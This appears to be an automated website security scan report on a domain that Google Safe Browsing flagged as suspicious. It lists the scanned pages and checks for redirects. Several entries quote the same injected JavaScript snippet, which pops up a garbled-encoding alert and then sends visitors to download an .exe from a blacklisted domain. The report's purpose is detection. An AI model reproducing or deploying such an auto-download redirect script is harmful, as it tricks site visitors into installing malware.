Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=qqq17.comwww.95sss.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.qqq17.comwww.95sss.com/ | HTTP/1.1 200 OK Date: Sat, 28 Feb 2015 11:49:49 GMT Accept-Ranges: bytes ETag: "b63ce37a5e4cd01:fc5" Server: Microsoft-IIS/6.0 Content-Length: 10238 Content-Location: http://www.qqq17.comwww.95sss.com/default.htm Content-Type: text/html Last-Modified: Thu, 19 Feb 2015 16:09:46 GMT X-Powered-By: ASP.NET | clean |
http://www.qqq17.comwww.95sss.com/default.htm | 200 OK Content-Length: 10238 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.youxintouzi.com ...[3694 bytes skipped]... ;/script><div class="clear"></div> </div> <div class="bbg20"></div> </div> <script language="JavaScript"> window.setTimeout("PopDownload()", 4 * 1000); function PopDownload() { window.alert("¿ì²¥ÒѾ±»ºÍг£¬±¾Õ¾ÆôÓÃȫв¥·ÅÆ÷¿á²¥Ó°ÊÓ£¬°²×°ºóÔËÐм´¿É¹Û¿´ÉÏÍòˬƬ£¡"); location.href = "http://www.youxintouzi.com/kuplay_110_12791.exe"; } </script> <div id="footer"> <div id="bottom"> <div class="layout mt10"> <div class="tbg20"></div> <div class="mainArea px9"> <h2 class="ml10">ÓÑÇéÁ´½Ó</h2> <ul class="bottomSponsor"></ul> <div class="clear">& ...[570 bytes skipped]... | ||
http://www.qqq17.comwww.95sss.com/top.js | 200 OK Content-Length: 611 Content-Type: application/x-javascript | clean |
http://www.qqq17.comwww.95sss.com/foot.js | 200 OK Content-Length: 766 Content-Type: application/x-javascript | clean |
http://www.qqq17.comwww.95sss.com/list/index39.html | 200 OK Content-Length: 7687 Content-Type: text/html | clean |
http://www.qqq17.comwww.95sss.com/list/../top.js | 200 OK Content-Length: 611 Content-Type: application/x-javascript | clean |
http://www.qqq17.comwww.95sss.com/list/../foot.js | 200 OK Content-Length: 766 Content-Type: application/x-javascript | clean |
http://www.qqq17.comwww.95sss.com/list/../default.htm | 200 OK Content-Length: 10238 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.youxintouzi.com ...[3694 bytes skipped]... ;/script><div class="clear"></div> </div> <div class="bbg20"></div> </div> <script language="JavaScript"> window.setTimeout("PopDownload()", 4 * 1000); function PopDownload() { window.alert("¿ì²¥ÒѾ±»ºÍг£¬±¾Õ¾ÆôÓÃȫв¥·ÅÆ÷¿á²¥Ó°ÊÓ£¬°²×°ºóÔËÐм´¿É¹Û¿´ÉÏÍòˬƬ£¡"); location.href = "http://www.youxintouzi.com/kuplay_110_12791.exe"; } </script> <div id="footer"> <div id="bottom"> <div class="layout mt10"> <div class="tbg20"></div> <div class="mainArea px9"> <h2 class="ml10">ÓÑÇéÁ´½Ó</h2> <ul class="bottomSponsor"></ul> <div class="clear">& ...[570 bytes skipped]... | ||
http://www.qqq17.comwww.95sss.com/list/../list/index39.html | 200 OK Content-Length: 7687 Content-Type: text/html | clean |
http://www.qqq17.comwww.95sss.com/list/../list/../top.js | 200 OK Content-Length: 611 Content-Type: application/x-javascript | clean |
http://www.qqq17.comwww.95sss.com/list/../list/../foot.js | 200 OK Content-Length: 766 Content-Type: application/x-javascript | clean |
http://www.qqq17.comwww.95sss.com/list/../list/../default.htm | 200 OK Content-Length: 10238 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.youxintouzi.com ...[3694 bytes skipped]... ;/script><div class="clear"></div> </div> <div class="bbg20"></div> </div> <script language="JavaScript"> window.setTimeout("PopDownload()", 4 * 1000); function PopDownload() { window.alert("¿ì²¥ÒѾ±»ºÍг£¬±¾Õ¾ÆôÓÃȫв¥·ÅÆ÷¿á²¥Ó°ÊÓ£¬°²×°ºóÔËÐм´¿É¹Û¿´ÉÏÍòˬƬ£¡"); location.href = "http://www.youxintouzi.com/kuplay_110_12791.exe"; } </script> <div id="footer"> <div id="bottom"> <div class="layout mt10"> <div class="tbg20"></div> <div class="mainArea px9"> <h2 class="ml10">ÓÑÇéÁ´½Ó</h2> <ul class="bottomSponsor"></ul> <div class="clear">& ...[570 bytes skipped]... | ||
http://www.qqq17.comwww.95sss.com/list/../list/../list/index39.html | 200 OK Content-Length: 7687 Content-Type: text/html | clean |
http://www.qqq17.comwww.95sss.com/list/../list/../list/../top.js | 200 OK Content-Length: 611 Content-Type: application/x-javascript | clean |
http://www.qqq17.comwww.95sss.com/list/../list/../list/../foot.js | 200 OK Content-Length: 766 Content-Type: application/x-javascript | clean |
http://www.qqq17.comwww.95sss.com/list/../list/../list/../default.htm | 200 OK Content-Length: 10238 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.youxintouzi.com ...[3694 bytes skipped]... ;/script><div class="clear"></div> </div> <div class="bbg20"></div> </div> <script language="JavaScript"> window.setTimeout("PopDownload()", 4 * 1000); function PopDownload() { window.alert("¿ì²¥ÒѾ±»ºÍг£¬±¾Õ¾ÆôÓÃȫв¥·ÅÆ÷¿á²¥Ó°ÊÓ£¬°²×°ºóÔËÐм´¿É¹Û¿´ÉÏÍòˬƬ£¡"); location.href = "http://www.youxintouzi.com/kuplay_110_12791.exe"; } </script> <div id="footer"> <div id="bottom"> <div class="layout mt10"> <div class="tbg20"></div> <div class="mainArea px9"> <h2 class="ml10">ÓÑÇéÁ´½Ó</h2> <ul class="bottomSponsor"></ul> <div class="clear">& ...[570 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: qqq17.comwww.95sss.com
Result:
GET / HTTP/1.1
Host: qqq17.comwww.95sss.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: qqq17.comwww.95sss.com
Referer: http://www.google.com/search?q=qqq17.comwww.95sss.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: qqq17.comwww.95sss.com
Referer: http://www.google.com/search?q=qqq17.comwww.95sss.com
Result:
The result is similar to the first query. There are no suspicious redirects found.